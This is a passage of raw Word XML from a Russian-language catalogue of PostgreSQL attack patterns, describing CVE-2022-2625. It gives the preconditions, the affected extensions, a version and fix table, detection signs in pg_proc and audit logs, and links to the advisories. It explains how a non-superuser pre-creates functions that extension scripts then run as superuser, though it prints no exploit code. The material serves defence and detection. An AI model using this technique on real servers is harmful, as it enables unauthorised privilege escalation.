        <w:t xml:space="preserve">•   CREATE FUNCTION в схеме, где extension будет создавать функцию (для contrib-extensions типично </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t>, что до PG 15 разрешено PUBLIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F96F9D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Знание signature функции из extension script (читается из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/usr/share/postgresql/&lt;ver&gt;/extension/&lt;name&gt;--&lt;v&gt;.sql</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFAEAF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Superuser не требуется</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1410D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия жертвы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D6FA85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   admin/superuser, выполняющий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (типично DBA, automated provisioning, package upgrade)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C55A82B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения уязвимые</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (примеры из contrib, использующие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в install-script):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D214A2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>intarray</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>intagg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hstore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>citext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cube</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>earthdistance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41273793" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>adminpack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ltree</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>isn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188BE815" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   не все из них имеют exploitable function signatures, но pattern одинаковый</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5333C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет специальных требований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F59A46"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6BDB6D5C"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D2C78DA"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E24FBC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="6689CDDD"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FF56A2"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AB7A90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2022-2625</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="613B9D3F"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AB7253"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4DA839" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8 (High, per PostgreSQL Project)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7E91C805"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0C748B"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FDF99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11 августа 2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="32AA48F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B3670C"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84FB52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG ≤ 14.4, 13.7, 12.11, 11.16, 10.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="614D369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DECD8"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33EE64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PG 14.5, 13.8, 12.12, 11.17, 10.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="35C8160B"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340489"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9EF91F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ownership check missing в CREATE OR REPLACE из extension scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="59413BF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028088"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09C7C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privilege escalation от CREATE-FUNCTION до superuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36A62828"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CREATE OR REPLACE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в extension scripts — стандартный pattern для contrib-extensions; так делают практически все pg-extensions в их upgrade scripts. Сама команда не подозрительна.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5F4D91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262F6EA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-create</w:t>
      </w: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для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>non-DBA роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в схемах, где обычно создают функции extensions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). В нормальной operations user-роли НЕ создают функции в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с signature, совпадающей с extension-функциями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B487E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-create статически</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: дамп </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с WHERE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proowner != extowner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — найти функции, owner которых не совпадает с owner-ом extension (которому функция принадлежит после CVE-2022-2625-style attack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCEB290" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trigger time</w:t>
      </w:r>
      <w:r>
        <w:t>: ANALYZE, REINDEX, любое использование функции из extension в expression — те же сигналы что 3.13.3 (потому что эффект аналогичный).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A50BA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   В audit-логах: цепочка CREATE FUNCTION + CREATE EXTENSION от разных ролей с одинаковыми signature — сильный индикатор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC5771" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   На версиях PG ≤ 14.4 / 13.7 / 12.11 / 11.16 / 10.21 — любое такое cooccurrence критично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52733AC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Уязвимы все ветки PG до фикса 11.08.2022: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754BBA42"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9A1DA80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>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14838EA"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ABC4FBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Фикс</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2A397192"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356372"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34F4CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.4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9FC446" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="61FCF54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C6B418"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F7F68D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.7</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BA668D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="42B00B58"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5A9EA0"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84474C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.11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B03362" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0498DCBC"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B01984" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11.x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CFC208" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11.16</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538818" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11.17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="22AC6BE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58CDDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.x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DEB8FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.21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6B4E6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.22 (EOL ветка, последний фикс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BB3B776" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На версиях PG ≥ 14.5 / 13.8 / 12.12 / 11.17 / 10.22 атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>закрыта</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — ownership check блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для функций других owner-ов в extension scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4891F518" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Дополнительная защита в PG 15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (релиз 13.10.2022): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REVOKE CREATE ON SCHEMA public FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> теперь default для новых кластеров. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>снижает поверхность атаки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> post-fix: PUBLIC больше не может создавать функции в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t>, типичная цель CVE-2022-2625-style attack. Для upgrade-нутых кластеров поведение остаётся старым (public open).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227481A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E6E4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.2 search_path + schema_element</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другой способ trojan-объекта, отрабатывающего под admin-привилегиями. Граница: 3.13.2 — через CREATE SCHEMA; 3.13.4 — через CREATE EXTENSION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA9E98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.5 Trusted extensions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — расширение поверхности атаки: с PG 13 trusted extensions можно устанавливать без superuser, что делает CVE-2022-2625 эксплуатируемой целиком из user-роли (chain в 3.13.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA31B83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий принцип защиты: явная квалификация всех имён в DDL и в function bodies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6358D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 / 3.7.2a / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — финальные RCE-векторы, к которым эскалирует CVE-2022-2625.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5316CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 (Хронология 2022)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст 11.08.2022 fixes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E9E41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B29C6AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Project Security Advisory: CVE-2022-2625 — https://www.postgresql.org/support/security/CVE-2022-2625/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7DB5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   EDB разбор: «PostgreSQL extensions impacted by CVE-2022-2625» — https://www.enterprisedb.com/blog/postgresql-extensions-impacted-cve-2022-2625-privilege-escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7466D2F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   NIST NVD: CVE-2022-2625 — https://nvd.nist.gov/vuln/detail/CVE-2022-2625</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B7AA84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
